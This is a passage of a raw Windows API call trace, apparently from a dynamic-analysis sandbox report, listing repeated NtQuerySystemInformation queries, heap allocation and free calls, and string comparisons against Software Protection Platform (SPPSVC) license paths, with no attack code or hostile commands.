(_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x50, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x28, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x28, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x20, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe970, Length=0x38, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x20, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x20, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe780, Length=0x20, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.576] GetProcessHeap () returned 0x2026c630000 [0210.577] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d803150 [0210.577] GetProcessHeap () returned 0x2026c630000 [0210.577] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9050 [0210.577] GetProcessHeap () returned 0x2026c630000 [0210.577] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c693a90 [0210.578] GetProcessHeap () returned 0x2026c630000 [0210.578] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c691de0 [0210.578] GetProcessHeap () returned 0x2026c630000 [0210.578] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8849f0 [0210.578] GetProcessHeap () returned 0x2026c630000 [0210.578] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d732a20 [0210.579] GetProcessHeap () returned 0x2026c630000 [0210.579] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804b70 [0210.579] GetProcessHeap () returned 0x2026c630000 [0210.579] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9270 [0210.579] GetProcessHeap () returned 0x2026c630000 [0210.579] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732900 | out: hHeap=0x2026c630000) returned 1 [0210.579] GetProcessHeap () returned 0x2026c630000 [0210.579] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026c6d9830 [0210.579] GetProcessHeap () returned 0x2026c630000 [0210.579] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c693760 [0210.580] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfebc8 | out: phModule=0xc751dfebc8*=0x7ffcea380000) returned 1 [0210.580] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.580] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfecf0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfecf0, ResultLength=0x0) returned 0x0 [0210.580] GetProcessHeap () returned 0x2026c630000 [0210.580] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8840f0 [0210.580] GetProcessHeap () returned 0x2026c630000 [0210.580] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d794bd0 [0210.580] GetProcessHeap () returned 0x2026c630000 [0210.580] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d803780 [0210.580] GetProcessHeap () returned 0x2026c630000 [0210.580] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9110 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d884330 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c691de0 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732a20 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804b70 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9270 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8849f0 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693760 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794bd0 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d803780 | out: hHeap=0x2026c630000) returned 1 [0210.581] GetProcessHeap () returned 0x2026c630000 [0210.581] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9110 | out: hHeap=0x2026c630000) returned 1 [0210.583] GetProcessHeap () returned 0x2026c630000 [0210.583] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8840f0 | out: hHeap=0x2026c630000) returned 1 [0210.584] GetProcessHeap () returned 0x2026c630000 [0210.584] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794310 | out: hHeap=0x2026c630000) returned 1 [0210.584] GetProcessHeap () returned 0x2026c630000 [0210.584] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693a90 | out: hHeap=0x2026c630000) returned 1 [0210.584] GetProcessHeap () returned 0x2026c630000 [0210.584] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884330 | out: hHeap=0x2026c630000) returned 1 [0210.584] GetProcessHeap () returned 0x2026c630000 [0210.584] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d803150 | out: hHeap=0x2026c630000) returned 1 [0210.584] GetProcessHeap () returned 0x2026c630000 [0210.584] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9050 | out: hHeap=0x2026c630000) returned 1 [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed60, Length=0x20, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb90, Length=0x50, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb10, Length=0x28, ResultLength=0x0) [0210.585] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb90, Length=0x50, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb90, Length=0x50, ResultLength=0x0) [0210.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb90, Length=0x50, ResultLength=0x0) [0210.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x38, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8f0, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8f0, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8f0, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe960, Length=0x28, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x38, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9e0, Length=0x28, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9e0, Length=0x28, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x20, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x20, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x20, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x20, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x38, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x38, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe940, Length=0x20, ResultLength=0x0) [0210.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x20, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x20, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec90, Length=0x28, ResultLength=0x0) [0210.595] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x28, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x28, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x28, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea50, Length=0x20, ResultLength=0x0) [0210.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea50, Length=0x20, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec90, Length=0x28, ResultLength=0x0) [0210.605] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", 